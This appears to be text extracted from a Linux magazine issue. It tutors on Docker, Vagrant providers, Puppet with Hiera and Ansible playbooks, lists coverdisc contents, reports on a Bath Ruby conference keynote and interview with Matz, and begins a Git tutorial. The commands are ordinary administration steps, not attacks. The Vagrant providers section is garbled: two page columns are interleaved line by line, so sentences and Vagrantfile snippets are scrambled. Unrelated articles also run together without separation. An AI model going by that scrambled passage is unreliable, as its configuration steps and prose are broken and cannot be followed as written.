This is a helpful tool for creating applications that span multiple containers, such as a website that's split into a webserver, database and content hosting components. See http://bit.ly/lud_compose for installation details.
3 Create a container
Pull down a new container, verify it's installed and run it with:
$ docker pull busybox
$ docker run busybox echo "testing my container"
4 Check container status
You can view all the currently installed container types using docker images. To get more useful information such as which containers are running and what they're up to, you should try: $ docker ps -a.
5 Access your container
Connect to your container and run multiple commands using -it:
$ docker run -it busybox sh
# ls
# ps -a
6 Destroy your container
After fetching the container ID using the second command in step 4, you can stop and remove that specific instance with $ docker rm -f containerid. On successful deletion you should see the containerid displayed.
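The Compose workflow described above relies on a docker-compose.yml sitting alongside the Dockerfile. The file supplied on the coverdisc isn't reproduced here, but a minimal sketch of the kind of file it would be might look like this; the service names web and db match the commands used earlier, while the /myapp mount path and the Rails server command are assumptions for illustration:

version: '3'
services:
  db:
    image: postgres
  web:
    build: .
    command: bundle exec rails server -b 0.0.0.0
    volumes:
      - .:/myapp
    ports:
      - "3000:3000"
    depends_on:
      - db

With a file along these lines in place, docker-compose up builds the web image from the Dockerfile, starts PostgreSQL alongside it and publishes Rails on port 3000.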
Vagrant is a mature product sponsored by a company called Hashicorp. Its main purpose is to provide a common command-line interface and provisioning structure across different virtualisation technologies. This means you can use the same commands with Oracle VirtualBox as you would with VMware Workstation and Hyper-V. Vagrant accomplishes this through the use of drivers which provide a wrapper for the command-line interface of whichever product you are provisioning your virtual machines with.

This also means you can create a single script to provision your server infrastructure, and if your on-site servers run out of space - or you use up all the licenses you've paid for - the same VMs can be created using a different product or cloud provider. This makes Vagrant a very powerful tool for sysadmins looking to roll out their own software-defined networks.

Developers will also find Vagrant particularly useful because they can create a common desktop environment with all the required IDEs and tools installed and roll this out quickly and easily for new team members. It's also possible to simulate a full server that's more representative of a production environment - particularly useful for software testing. You may be wondering how Vagrant ties in with app containerisation. Well, Vagrant can provision Docker containers in exactly the same way it does with VMs. It's also possible to deploy a Docker container on any virtual server within your network by setting it as the 'provisioner' Vagrant runs after creating and booting a VM.

Above When only a GUI will do, you can edit your Vagrantfile to install a desktop and not run headless

quick tip
Managing Vagrant plug-ins
You can check which plug-ins have been installed with the command $ vagrant plugin list. Simply replace list with update to download new versions of these plug-ins, and to add new functionality try vagrant plugin install vagrant-exec.

The first step is to install your virtualisation platform of choice. Vagrant supports Oracle VirtualBox natively, as long as you also install its associated extension pack. VMware Workstation is also supported on local desktops, but you will need to purchase the proprietary Hashicorp driver for Vagrant to work with this 'provider'.

Next, fetch the installer from www.vagrantup.com. You should avoid installing Vagrant through your package manager, as it will often be an old version that may not be fully compatible with the latest and greatest release of VirtualBox.

As soon as the install is complete you can boot your first virtual machine, without any prior configuration, using just a few simple commands. For example:

$ mkdir test && cd test
$ vagrant init bento/ubuntu-18.04
$ vagrant up

You'll notice that no extra windows have appeared on the screen. That's because Vagrant VMs run headless by default, so you would access it using

$ vagrant ssh-config
$ vagrant ssh

Any file that you place in the same directory as Vagrantfile will also be available to the guest operating system under /vagrant. However, you may wish to run a full GUI on your VM, and in that situation a headless setup with only SSH access wouldn't be particularly helpful. Fortunately, there's a way to change this behaviour.

You may have noticed that when you ran vagrant init, a file was created in the test directory called Vagrantfile. This is where you can tweak the settings for your VM, and by default it is filled with plenty of hand-holding comment lines to help you navigate it. You will notice that config.vm.box defaults to base, or whatever you stated as a choice when you ran the vagrant init command. Scroll past the sections for port forwarding and shared folders, and you'll find the following code line:
# vb.gui = true

Unfortunately, just uncommenting that line by removing the # won't work. Vagrant is built on Ruby, so you need to ensure the config.vm.provider line and its matching end are also uncommented. Once you've saved your changes you can restart the VM with

$ vagrant reload

If all has gone well you should now see a VM window appear with a shell login prompt. The VM we specified earlier is a server distribution of Ubuntu 18.04, so to install the GUI we would need to install ubuntu-desktop through the package manager. Just like real machines VMs take a while to boot up, so you may prefer to save the current machine state and resume from it instead. You can do this with

$ vagrant suspend
$ vagrant resume

You can gracefully shut down a VM by telling it to halt, and once you're done with the box you can delete it with destroy. If you need to verify the current state of your VM before you run any commands at all, you can get some useful output from:

vagrant status

It's also wise to take regular snapshots which you can roll back to if you make any mistakes or run into problems. The pair of commands you need for this are

vagrant snapshot save REF
vagrant snapshot restore REF

where REF is whatever you want to call your snapshot. The first command creates the snapshot while the latter restores from it.

We mentioned earlier that it's possible to forward ports with your Vagrant VMs. By default the only forwarded port is SSH, which is mapped to localhost:2222, and all others are inaccessible from the host system. Simply uncomment a single line in your Vagrantfile to map HTTP port 80 to http://localhost:8080. You can also copy and paste this line, editing the port numbers as needed for the app you're running in your VMs.

Above Hashicorp's documentation covers provisioners, providers, command line help and Vagrantfiles

quick tip
Create your own box
It's possible to create your own base image for Vagrant and provision VMs using it. You will need to tweak your base image, populate a metadata JSON file and then package it for your provider. Find out more at www.vagrantup.com/docs/boxes/base.html.

products
Hot Vagrant plug-ins
Extending functionality is a vagrant plugin install command away
1 BDD with Cucumber
With the help of vagrant-cucumber, you can run all your behavioural tests locally against your Vagrant VM. To launch them, copy your pre-existing .feature files and step definitions to the Vagrantfile folder and run vagrant cucumber from there.
2 Shell commands
vagrant-exec runs shell commands inside your VM, and you can do this by navigating to the Vagrantfile directory and prefixing each one with vagrant exec. It's easy to remember and means you don't need to create a new SSH session each time.
3 Fabric provisioning
vagrant-fabric takes things a step further by enabling you to execute scripted actions and deployments with the help of a Python 2.7 extension called Fabric. Use it as a provisioner in your project's Vagrantfile.
V
agrant’s native support for Oracle image and run it, replace d.build_dir with:
VirtualBox is not your only option
for using it. Thanks to community # d.image = "nginx"
plug-in support and code contributions, it’s
also possible to use other providers. This is In both cases Vagrant is smart enough
particularly useful in enterprise settings to forward the right ports and set up a
where you might already be running folder share with the same directory as
your Vagrantfile. If
you’re trying to do
Unlike the Docker provider you either of these things Above Provisioning Docker containers with
on a non-Linux host Vagrant is handled just as elegantly as VMs
will need to install the OpenStack system, Vagrant will
attempt to provision everything with Puppet: see https://wiki.
provider as a plug-in a VirtualBox VM from openstack.org/wiki/Packstack.
a ‘boot2docker’ image Just like our Docker provider you can
first so it can still set use specific settings in your Vagrantfile to
something more scalable like OpenStack or up your Docker containers as instructed. provision new instances on OpenStack, and
VMware vSphere. As an example, you can OpenStack is intended to be a free and you can see a sample of this on its GitHub
use Docker as a provider for your Vagrant open source software platform for in-house page, http://bit.ly/lud_openstack. Unlike
configurations on Linux hosts just as easily cloud computing. OpenStack itself can be the Docker provider you will need to install
as you would VirtualBox. The only difference tricky to set up on test rigs and it needs the OpenStack provider as a plug-in:
is the exact set of commands you would use a lot of raw hardware power to be useful.
to do that in your Vagrantfile: Fortunately, you can use PackStack to build vagrant plugin install vagrant-
openstack-provider
# Vagrant.configure("2") do |config|
# config.vm.provider "docker" do quick tip If only one provider is specified your
|d| Try Kubernetes with Vagrant Vagrantfile should default to using it.
# d.build_dir = "." Sometimes Docker containers need to However if you have more than one
# end be deployed at scale and that’s where specified, or Vagrant doesn’t seem to
#end Kubernetes comes in. Try it out locally be detecting it, you can force a specific
with Vagrant by cloning the project’s provider choice:
This tells Vagrant to use Docker as a official GitHub project and running $
provider, and then instructs that provider to export KUBERNETES_PROVIDER=vagrant vagrant up --provider=openstack
build a container from the Dockerfile you’ve then $ ./cluster/kube-up.sh
provided. To directly download a container Another popular (albeit non-free) enterprise
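The plug-in's sample Vagrantfile sets credentials and instance details with provider-specific options along these lines (a sketch based on the plug-in's documentation; option names can change between releases, so check the GitHub page above):

config.vm.provider :openstack do |os|
  os.openstack_auth_url = 'http://YOUR-KEYSTONE-SERVER:5000/v3'   # your Keystone endpoint
  os.username           = 'openstack-user'
  os.password           = 'openstack-password'
  os.tenant_name        = 'demo'
  os.flavor             = 'm1.small'
  os.image              = 'ubuntu-16.04'
  os.floating_ip_pool   = 'public'
end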
Quick guide
Vagrant in the cloud
Scripting and managing your own servers and in-house infrastructure is far from the only use for Vagrant. There are community providers for a whole host of cloud platforms, which means that you don't need to create new scripts for different APIs every time you want to create VPSs with a new provider.
However, there are certain limitations. For example, AWS creates new services on an almost daily basis and there is only a limited subset of its API that's going to have functionality in common with Azure and Google Cloud. As a result you may still need to use a mix of Vagrant and custom scripts to get the most out of your subscriptions.
However, if you just need to create the same EC2 instances on a regular basis, and can skip tools like Elastic Beanstalk, you can provision a VM by specifying your AWS authentication settings and AMI configuration using the sample Vagrantfile at http://bit.ly/lud_aws.

Above Hashicorp provides its own service for provisioning VMs across multiple cloud providers
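For reference, a vagrant-aws Vagrantfile boils down to something like the following (a sketch following the plug-in's README pattern rather than the magazine's download; keys, key pair and AMI ID are placeholders):

Vagrant.configure("2") do |config|
  config.vm.box = "dummy"
  config.vm.provider :aws do |aws, override|
    aws.access_key_id             = "YOUR-ACCESS-KEY"
    aws.secret_access_key         = "YOUR-SECRET-KEY"
    aws.keypair_name              = "your-keypair"
    aws.ami                       = "ami-xxxxxxxx"
    override.ssh.username         = "ubuntu"
    override.ssh.private_key_path = "~/.ssh/your-keypair.pem"
  end
end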
Top Left Vagrant makes light work of automating the provision of VM infrastructure with OpenStack
Above Left Provider plug-ins normally supply a handy sample Vagrantfile with the original source
Above Right Vagrant supports Hyper-V, but some extra manual preparation steps are required

Quick tip
Alternative provisioners
In this feature we primarily focus on Puppet and Ansible, but these are not the only provisioning systems available. Chef is a well-established alternative and a new Python-based system called SaltStack is now available. Both are supported as Vagrant provisioners.

Another popular (albeit non-free) enterprise virtualisation platform is VMware vSphere. Just like OpenStack it's supported as a Vagrant provider once you've installed the plug-in for it:

vagrant plugin install vagrant-vsphere

You have the choice of building from a box or re-using any from within vSphere. Any boxes you create with VMware Workstation will usually work with vSphere after some minor tweaks because of the shared underlying technology, although you may find it easier to simply import the VM image through the management console and use it as a server template instead. Read more at http://bit.ly/lud_vsphere.
Finally, if the virtualisation product you use is based on the XenServer hypervisor, you're also in luck. The vagrant-xenserver provider plug-in requires you to create your own boxes, but fortunately you have some options. XVA files stored locally on the hard disk or at a network location are supported, as are generic VHD files, which you can create in any VirtualBox VM. See http://bit.ly/lud_xen for more on this plug-in.
KVM is also supported as a provider by the vagrant-libvirt plug-in, but you'll need to install a number of packages before it will build and run correctly. You can find out which ones you need and how to install them on your distribution of choice at http://bit.ly/lud_libvirt. Another popular virtualisation platform in many businesses is Hyper-V, an optional component for Windows that's been available since Windows 8 and Server 2008. This native hypervisor for the NT kernel was originally created to replace the venerable Microsoft Virtual PC, an application that can be best described as a Windows-only alternative to VirtualBox.
It's fair to say that Hyper-V is a lot more sophisticated, isolating virtual machines into their own 'partitions' and intercepting any direct calls to the hardware at the kernel level. It's also the system on which the official Windows port of Docker relies in order to function, although you'll typically find you'll need to switch that off to avoid problems when you interact with Hyper-V directly with Vagrant. Bear in mind that while Hyper-V is enabled on your system Oracle VirtualBox won't run, so you will need to choose one or the other to run on your host system. It gets a little worse, too, as Vagrant is not able to control everything it needs to with Hyper-V to fully function right away. For example, it isn't able to create or configure new virtual networks on the fly, so you'll need to set this up manually before you start using it. Similarly it's unable to automatically set a static IP address or automatically configure NAT access to the rest of your network. There's more info at http://bit.ly/lud_hyperv.
If you can get past these limitations, your main hurdle will be in creating compatible boxes. Windows guests will need to have Windows Remote Management up and running and an OpenSSH server installed to function correctly, and you will likely need to use the PuTTY SSH client (www.putty.org) because the vagrant ssh command doesn't work on Windows by default.
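If you want to try the KVM route mentioned above, the basic dance is the same as for the other providers, assuming the build dependencies described at the lud_libvirt link are already installed:

$ vagrant plugin install vagrant-libvirt
$ vagrant up --provider=libvirt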
Puppet provisioning
Centrally manage application deployments and server configuration files

Puppet's main function is to manage configuration for Linux and Windows boxes across the network by slaving their settings to a common 'master' configuration called a 'catalogue'. The key benefit of this is that you can set common configurations for your servers in one place rather than having to do it manually on each server.
This should, in theory, mean fewer hard-to-troubleshoot typos and confusing log messages being caused by bad configuration values. However, Puppet takes this a step further by enabling you to define settings for smaller clusters of servers or even individual boxes from that same master server. As long as the slave is running the supplied agent software, and it has synced with the master at least once, it will respect any changes you decide to make to its environment. Puppet can track the current running state of network services and restart them as needed. It can also verify if a specific version of a package has been installed or not.
The first thing you will need to get started is a Puppet master and at least one server running the agent software. To accomplish this with Docker we need to create two containers and tie them together in the same emulated subnet so they will detect each other, like so:

$ docker network create puppet
$ docker run --net puppet --name puppet --hostname puppet puppet/puppetserver-standalone
$ docker run --net puppet puppet/puppet-agent-alpine

In this example, the Puppet agent will spot the server, fetch the latest configuration and then immediately terminate. The developer has provided much better examples that make use of Docker Compose, as well as documentation on how to tweak catalogues, on GitHub: http://bit.ly/lud_puppet.
To accomplish the same thing using VMs provisioned with Vagrant, you'll first need to create a VM with your Puppet master installed and forward ports 22 and 8140. You would then need to ensure you configure the Puppet provisioner in the second VM to point at the master. The code you need for the Vagrantfile looks like this:

# config.vm.provision "puppet_server" do | puppet |
#   puppet.puppet_server = "server.domain"
# end

Simply change server.domain to the hostname or external IP address of your Puppet master and it should connect when you build your VM. A more advanced example using shell scripts and multiple folder shares is available at http://bit.ly/lud_puppetmaster.
To install the Puppet server through the package manager on natively installed Linux setups – or your Puppet master VM if you chose to use a vanilla Vagrant image – you will first need to enable the Puppet package repositories. For Debian-based distros you can fetch a matching DEB file from https://apt.puppetlabs.com, while Yum-based distros need the relevant RPM from https://yum.puppetlabs.com/puppet5. Once that's done installation is as simple as installing the puppetserver package.
Installing the agent on other servers follows exactly the same process as installing the master, but you install puppet instead of puppetserver. The default hostname of the Puppet server is puppet unless you change this manually, so this is what you would configure your installed Puppet agents to look for.

Quick tip
Should I use Puppet Enterprise?
The commercial version of Puppet provides server-auditing tools, a browser-based GUI for Hiera, support for provisioning VMs, sophisticated role-based access control and a support contract. It's up to you as to whether these extras are worth the cost.

Above If the hostname of your Puppet master is 'puppet', every agent on the same network or subnet will detect it automatically on launch and sync the catalogue straight away
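To give a flavour of what those centrally managed settings look like, the master's manifests declare resources that the agents then enforce. A minimal, generic sketch (not taken from the feature's example code):

# /etc/puppetlabs/code/environments/production/manifests/site.pp
package { 'ntp':
  ensure => installed,
}

service { 'ntp':
  ensure  => running,
  enable  => true,
  require => Package['ntp'],
}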
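On a Debian-based box the repository-plus-install step described above looks roughly like this (the release package name tracks your distro codename, so xenial here is just an example; check the repository index for yours):

$ wget https://apt.puppetlabs.com/puppet5-release-xenial.deb
$ sudo dpkg -i puppet5-release-xenial.deb
$ sudo apt-get update
$ sudo apt-get install puppetserver   # or 'puppet' on an agent-only machine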
It's also highly recommended that you set up a good NTP service on your Puppet master server, because syncing between it and all servers running the agent requires the use of time-limited certificates. If the system clocks are too far out of sync the servers will refuse to accept any new changes. Finally, you can

How to
Manage environment variables with Hiera

1 Edit hiera.yaml
This file lists the 'facts' you want to track. With a config folder of /etc/puppetlabs, define searchable folders in puppet/, common variables in code/environments/production/ and package settings in code/environments/production/modules/<modulename>.

2 Write a custom module
Create a new module called 'profile' and write a test class for it, ensuring it uses parameters with memorable names and sensible data types. Writing a test manifest is optional, but it can be helpful when troubleshooting your module and key values later.

3 Set common values
Head to the data/ directory in the production environment folder and set your variables in common.yaml. The keys you define should follow the pattern profile::test_class::parameter and their values should match the data types you set in your module.

4 Verify your facts
After successfully compiling your module and test class you can verify your settings with:

$ puppet lookup profile::test_class::parameter --environment production --explain
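As a concrete (if artificial) illustration of steps 2 and 3, the class and its matching Hiera key might look like this; the names simply follow the profile::test_class::parameter pattern used above:

# code/environments/production/modules/profile/manifests/test_class.pp
class profile::test_class (
  String $parameter = 'default-value',
) {
  notify { "profile::test_class::parameter is ${parameter}": }
}

# code/environments/production/data/common.yaml
---
profile::test_class::parameter: 'value-from-hiera'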
Configure Ansible
Manage your applications and configuration with Red Hat's answer to Puppet

Puppet is far from the only system you can use to centrally manage the provisioning of applications. Ansible prides itself on being easy to learn and is in many ways a lot simpler to use than its rivals. Puppet, for instance, relies on agents that request manifests and poll for changes before they can edit files and run custom tasks. Ansible, on the other hand, doesn't require any agents, instead reading plain English definitions of tasks you want to perform on-the-fly from a YAML file, known as a playbook.
Ansible itself is also built on Python rather than Ruby, so you may find that writing custom modules yourself has a shallower learning curve than Puppet, which often requires you to download a special SDK and consult your resident 'subject matter expert' on its internal workings.
However, the main downside is there's no central community repository for pre-built Ansible modules and playbooks to match the equivalents for Docker, Vagrant and Puppet. As a result you may have to scour GitHub for helpful module code. Thankfully, in the case of playbooks the situation is helped significantly by the comprehensive project documentation and a community of bloggers.
As mentioned, Ansible's playbooks are defined in YAML, and each 'play' in that file follows a consistent pattern. First, you define the hosts (servers) that the play will apply to, and which users Ansible should run as on those machines. You would use the 'root' remote user to install packages and edit sensitive files, but if you've disabled root logins over SSH you can elevate yourself in the next stage.
That next stage is where you define your tasks. Typically you will want to set a name for each of them, for logging purposes, and then tie each to a service or command. You can also use a template file to overwrite existing configuration files on those destination servers. Finally, you set up your handlers, which tell the machines you're controlling how to respond if services go down or certain files change. You can also configure them to listen for other tasks being run and send notifications or log messages wherever they're needed. Execute it with:

$ ansible-playbook myplaybook.yml -f 10

If your playbook is tracked in a git repository you can also clone and run that YAML file with:

$ ansible-pull -U [email protected] myplaybook.yml

That's enough to get you started. Now, it's time to dive in yourself!

Quick guide
Installing Ansible
The most straightforward way to get Ansible up and running is by installing it through the pip package manager distributed with Python. However, you can also install it through your distro's package manager. Unfortunately the latest version won't be in the main channels by default, so there's a little extra legwork to do. RHEL 7 users need to enable the Extras repository before Ansible can be installed through yum, while older versions will need you to enable EPEL. Meanwhile, Ubuntu users can install the latest package from the project's PPA; just run the following command to add that:

$ sudo apt-add-repository ppa:ansible/ansible

Quick tip
Taking things a step further
You will find more documentation for Ansible Core and Ansible Tower (the enterprise version that provides a pretty web GUI) at https://docs.ansible.com. This covers setup steps, playbooks and modules for every supported version in much greater detail than we're able to fit in this already packed feature.

Above Playbooks are Ansible's equivalent of Puppet's manifests. The decision to use YAML and a straightforward task-based structure helps keep the learning curve shallow for devops teams
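Put together, a small playbook following that hosts/tasks/handlers pattern looks like this. It's a generic sketch: the host group, package and template names are ours for illustration, not taken from the feature's download bundle:

# myplaybook.yml
---
- hosts: webservers
  remote_user: root
  tasks:
    - name: Ensure Apache is installed
      apt:
        name: apache2
        state: present

    - name: Deploy the site configuration from a template
      template:
        src: vhost.conf.j2
        dest: /etc/apache2/sites-available/000-default.conf
      notify: restart apache

  handlers:
    - name: restart apache
      service:
        name: apache2
        state: restarted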
Free with issue 191

Ubuntu MATE
All the power of Ubuntu, MATE's traditional desktop experience and enhanced HiDPI support. Sample a modern take on the traditional desktop metaphor: built on the solid foundations of the latest Ubuntu 18.04 LTS, it benefits from February's new release of MATE 1.20, which now has HiDPI support for crisper, more detailed images.

MX Linux 17.1
A fast, friendly and stable Linux distribution loaded with an exceptional bundle of tools: a middleweight distro using a custom Xfce desktop which packs an excellent selection of administrative utilities into its MX Tools dashboard.

Devuan 2.0 ASCII (beta)
An incredibly solid beta of the next edition of Devuan, the distro without systemd.

All the tutorial code
If you dived straight into our Control Containers feature (on p18), you'll want to grab our example scripts, Dockerfiles, Ansible playbook samples and Puppet manifests. In Computer Security this issue, we look at privilege escalation, which is something of an art, and we've included a few tools of the trade, including Vulners Scanner.

The DVD autoboots to a menu, so simply insert the disc and follow your PC manufacturer's instructions. Unless otherwise stated, all software on this disc is distributed in accordance with the GNU General Public License; for more information please visit www.gnu.org/licenses/gpl-3.0.txt. We do still recommend that you run a virus checker over this disc before use.
Feature Special Report: Ruby

Ruby is alive & well
The creator of Ruby declares "We will do everything to survive" in his first UK keynote speech in five years. Chris Thornett reports from the Bath event
Dan Bartlett

Key info
The annual Bath Ruby conference is the biggest Ruby developer event in the UK and takes place over two days, with a mix of technical and non-technical speakers plus workshops (not to mention karaoke). https://bathruby.uk

"How is software born?" It's an unusual first question from the genial Japanese creator of the Ruby programming language, Yukihiro 'Matz' Matsumoto. He's making his first keynote speech in the UK in five years to over 500 Ruby developers at the annual two-day Bath Ruby Conference. Ruby celebrated its 25th year in February although officially its first release, 0.95, was in December 1995, so in answer to his own philosophical question, Matz suggests that software is born when it is named. It's the kind of poetic answer you expect from the creator of such an expressive language and means Ruby was 'born', at least for Matz, two years earlier on 24 February 1993 – hence the big celebration in Tokyo earlier this year and across social media. Talking of the language's origins, Matz says he wanted to name it after a jewel: "Ruby was short, Ruby was beautiful and more expensive, so I named my language Ruby," he says, joking with his community.
However, Matz isn't in the UK for the first time in five years just to eat birthday cake. Ruby may have reached maturity, but there are still questions over whether it can survive another 25 years. Like its creator, the Ruby language is very likable and garners passionate followers. Its syntax, for instance, is very readable but expressive in a terse way, and as a dynamic, reflective, object-oriented, general-purpose programming language it's intuitive and easy to learn. Ruby tries not to restrict those who use it, or as Matz is often quoted, "Ruby is designed to make programmers happy."
But not everyone is happy. The popularity of the language has been bolstered for many years by the dominance of the Ruby on Rails (RoR) web application framework, particularly among startups who wanted something to deal with much of the heavy lifting. That popularity saw the Ruby language soar to fifth place in the RedMonk Language Rankings in 2012, and rank in the top 10 in other indexes.
Since then, Ruby has drifted down to eighth. RoR, although popular, isn't the superstar it once was and has faced fierce competition as issues such as scaling have become a greater concern for older web companies. Although not directly comparable and with its own limitations, the JavaScript run-time environment Node.js, for example, has become popular for its runtime speed at scale, ease of adoption for back-end use by front-end JavaScript users, and its single-threaded approach to handling multiple
connections, among other things (although that does make it less suitable for CPU-intensive tasks such as image processing).
It's clear Matz is aware that the adoption of any programming language is stimulated by the projects and frameworks that grow from a language's community and ecosystem – and RoR is an astonishing example of that. So while he was keen to use his keynote to express his regret for past mistakes he'd made in the language, he also wanted to define a path to address the performance and scaling issues.
Matz focused on two key trends: scalability, and what he calls the "smarter companion". To combat scalability and create greater productivity, Matz believes that "faster execution, less code, smaller team [are] the keys for the productivity." Computers are getting faster, he told the packed hall, but it's not enough: "We need faster execution because we need to process more data and more traffic. We're reaching the limit of the performance of the cores. That's why Ruby 3.0 has a goal of being three times faster than Ruby 2.0" – or, as he puts it, "Ruby3x3".
"This is easy to say," Matz acknowledges, adding that in the days of 1.8, Ruby was "too slow" and a mistake. Koichi 'ko1' Sasada's work on YARV (Yet another Ruby VM) improved performance for Ruby 1.9, and "since then," says Matz, "we have been working hard to improve the performance of the virtual machine, but it's not enough."

Spotlight
Sharing recipes with Ruby
Cookpad (https://cookpad.com/uk), the main sponsor of the Bath Ruby conference, is a classic example of a web company that relies heavily on Ruby and Ruby on Rails. It's a recipe-sharing site, and while CTO Miles Woodroffe says the site has over 60 million users a month in Japan, it's also expanding globally, having moved its international HQ to Bristol. "We're really invested in Ruby as a platform," Woodroffe told us. "A lot of our infrastructure is powered by Ruby scripting – Ruby for everything pretty much."
As well as having 100 Ruby engineers dotted around the world, Cookpad employs two core Ruby team members full-time. One of them is Koichi 'ko1' Sasada, creator of YARV – the official interpreter for Ruby since 1.9. Sasada is now working on concurrency (Project Guild) and it's another way Woodroffe expects to see performance gains. Ruby 3, however, is the game changer: "It's quite a huge paradigm shift in how Ruby is built and interpreted," says Woodroffe. "So if we get this three times performance for everyone [...] less resources will be needed to do the same thing and probably save us money."

Above Cookpad's CTO Miles Woodroffe: "You stumble upon little tiny improvements to the language in every release, so it's a really fun language to work with"

Time for JIT
To improve performance further Ruby is introducing JIT (Just-In-Time), a technology already used by JVM and other languages. "So we've created a prototype of this JIT compiler so that this year, probably on Christmas Day, Ruby 2.6 will be released," Matz confirms. You can try the initial implementation of the MJIT compiler in the 2.6 preview1 (http://bit.ly/Ruby2-6-0-preview1). Currently, you can check and compile Ruby programs into native code with the --jit option. Matz says it's "not optimised" although for "at least CPU intensive work it runs two times faster than Ruby 2.0," which he feels "offers a lot of room to improve performance of the JIT compiler". For CPU-intensive tasks, in particular, Matz sounds confident that they would be able to accomplish the x3 performance improvement.
Probably the clearest overview explanation of how MJIT works is supplied by Shannon Skipper (http://bit.ly/RubysNewJIT): "With MJIT, certain Ruby YARV instructions are converted to C code and put into a .c file, which is compiled by GCC or Clang into a .so dynamic library file. The RubyVM can then use that cached, precompiled native code from the dynamic library the next time the RubyVM sees that same YARV instruction."
Scalability, Matz also believes, should mean creating less code, as "more code is more maintenance, more debugging, more time, less productivity," and, he joked, "more nightmare." Less Ruby code isn't going to mean significant changes to the language's syntax, however, largely because there's little room for change: "We have run out of characters. Almost all of them are used," says Matz. Being an exponent of egoless development, he's also not prepared to change the syntax for the sake of his pride and see existing Ruby programs broken, so he was careful to say that they weren't going to change Ruby syntax that much.
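If you want to experiment with the preview's --jit option mentioned above, it is passed straight to the interpreter when you run a script (the script name here is your own, and the flag may evolve in later releases):

$ ruby --jit my_script.rb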
Matsumoto also touched on Ruby becoming a "smarter companion" as well as the programmer's best friend. "We [are] now at the beginning of smarter computers, so, for instance, RuboCop [static code analyser] is one way of helping you." Matz also suggested that in the future, when you compile a program "Ruby could suggest [for example] 'You called this method with an argument string but [did] you expect to call this method with integer?'". After his keynote, Matz described this programming interactivity to be something like Tony Stark's Jarvis. Essentially, he wants to see "an AI that will interact with me to organise better software."
Change brings with it the possibility of software that no longer works as intended, or indeed at all. It's a concern that haunts Matz from past mistakes: "In the past we made a big gap, for example between 1.8 and 1.9," he says. "We made a big gap and introduced many breaking changes, so that our community was divided into two for five years." Matz sees this as a tragedy: "We're not going to make that mistake again so we will do a continuous evolution. We're going to add the JIT compiler to 2.6 and not wait until Ruby 3.0, we're going to add some type of concurrent abstraction in the future in Ruby 2.7 to 2.8, but it will not be a breaking change. We will have it so that every Ruby 2 program will run in Ruby 3."
Reversing Ruby's current slow trajectory downwards is not going to be an easy task and Matz seems to realise this: "Ten years ago Ruby was really hot, because of Rails. These days Ruby isn't considered hot, but it is stable." Indeed, Ruby has crossed that gap into maturity and Matz has no intention of giving up on it any time soon: "Ruby is a good language to help you become productive and I want Ruby to be like that for forever, if possible. That means we have to evolve continuously forever, so we can't stop; we can't stop."

Above The first Ruby Hack Challenge outside of Japan reflects a drive to see more contributors from the global Ruby community

Q&A
Creator of Ruby, Yukihiro 'Matz' Matsumoto

What is it about programming languages that fascinate you?
The programming language is the way to express what you want a computer to do in a way that both we humans and computers can understand. It's kind of a compromise. But at the same time it is the programming language that is the way to express your thoughts in a clear manner so that it is also a tool to express your ideas. Think about that – you can write down your software on a sheet of paper, so it doesn't execute on the computer simply because it can't see the paper, but it is still a program and it will still help you understand what you want to do.
Programming languages have different ways to express ideas, how to organise the software structure or maybe providing some kind of abstraction. It's that part, it's that psychological aspect of the language that's motivated me to work on it for the last 25 years.

Have you always been a fan of open source software? Was that always your intention when creating Ruby?
Actually, when I was at school I studied programming a lot from reading the source code from free software, like [GNU] Emacs and other free software tools, so it was so natural for me to make my software free or open source, unless I have some constraint like the software was owned by the company or something like that. But Ruby was originally my hobby project.

Have you encountered people who are afraid of the changes to Ruby?
We made several mistakes designing the language, but if we fix them in the future that would break so much code, so we've given up that kind of fix. Fixing the issues would satisfy us and our self-esteem, but it is not worth it to harm the big codebase. For example, if I make this small breaking change that would affect 5 per cent of the users that could improve performance by a factor of two, I would like to do that... but I'm not going to do a change for my sense of self-esteem.

How do you feel about people who say Ruby is dead – does it bother you much?
[Laughs] Yeah, I don't mind criticism. If someone has some bad thing about the language they just leave without saying anything. But having criticism is an indication that we have something to improve. I welcome that kind of criticism so we can take it constructively.
Tutorial Essential Linux: Git
part one

Resources
Wget: install through your package manager or from www.gnu.org/software/wget

Above GitHub provides a user-friendly way to host and browse through Git projects
The first step is to create a new repository, which we will do on the GitHub website. Navigate to the home page at https://github.com and click the button that says 'Start a project'. A page will appear asking for a project name and some other information. Since GitHub projects need to have unique names, we cannot suggest a particular name for you to use, so you'll need to come up with your own name for the project; try to include 'Emma' somewhere in order to make it clear what the project is about. If you like, write a description of the project.
Tick the box that says 'Initialize this repository with a README'. This will create a README file inside the repository that we can use to record important information about the project. More importantly, creating this file will initialise the repository so that we can start working with it on our computer.

Readme
It's traditional to initialise a GitHub repository with a file, README.md, that contains information about the project such as its name, a description and possible installation and running information. Unlike a normal text README, the file README.md supports Markdown formatting, so we can make headings using # Heading, bold text using **bold** and italics using *italics*. This formatted text is what appears on the project's home page.

Click 'Create repository' in order to create the repository; we arrive at the home page for our new repository. The GitHub website enables us to make lots of changes online, but from now on we'll stick to using Git from the command line.
The last thing we need to do is to click the green button marked 'Clone or download' and copy the URL that appears, as shown in Figure 1. This is the location of our repository online, and we will need it in order to clone the repository to our computer.

Figure 1 GitHub makes it very easy to copy the link that enables us to unlock the power of Git at the command line

Git is not tied to GitHub in any way; however, this website is the most commonly used repository of Git projects.

Clone and start the repository
Open a command window, and navigate to the location where you want to clone the repository. It's a good idea to create a new directory to hold all your Git projects. Once inside that directory, type git clone and then paste in the URL that you copied and press enter. For example:

$ git clone https://github.com/My_Name/collaborative-emma-novel.git

This will create a new directory with the same name as the project. Navigate into it with cd. The directory we have created is a local copy of the project living at GitHub.com. At the moment, it appears to contain nothing but the README file, but if we run the command ls -a, we see that it also contains a directory called .git. This directory contains all the information about the project that Git needs to run – make sure you don't delete it! When we make changes in the local branch, they will not be pushed to the server immediately. This is a good thing, because it means that if two people are working on a file at the same time, we have a chance to reconcile the changes.
It's time to initialise the repository by adding some files. In order to download Jane's novel, run the following:

$ wget www.gutenberg.org/files/158/158-0.txt -O novel.txt
$ sed -i -e 's/\r//' novel.txt

We now have a file, novel.txt, that contains the text of the novel. The second command converts the text file newlines from DOS to UNIX format.
Before we do anything else, let's push this new file to the online repository. When we do this, it's a good idea to check the status of our local branch by running the following command:

$ git status

We should see the following output:

On branch master
Your branch is up-to-date with 'origin/master'.
Untracked files:
  (use "git add <file>..." to include in what will be committed)

	novel.txt

This tells us that the new file, novel.txt, is not yet being tracked by Git. We remedy this situation by running the following command:

$ git add novel.txt

If we run git status again, then we see that novel.txt is now marked as a 'new file'.
